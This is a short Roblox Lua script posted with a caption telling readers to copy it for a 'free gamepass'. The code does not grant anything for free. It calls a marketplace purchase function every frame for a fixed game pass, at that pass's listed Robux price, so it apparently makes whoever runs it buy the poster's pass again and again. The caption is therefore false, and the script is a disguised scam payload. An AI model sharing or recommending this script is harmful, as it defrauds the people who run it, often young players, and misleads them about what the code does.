gamePassId = 6028667 market = game:GetService("MarketplaceService") http = game:GetService("HttpService") info = market:GetProductInfo(gamePassId, Enum.InfoType.GamePass) game:GetService("RunService").Stepped:connect(function() market:PerformPurchase(Enum.InfoType.Asset, info["ProductId"], info["PriceInRobux"], http:GenerateGUID(false)) end)
👆Copy This Script For Free Gamepass👆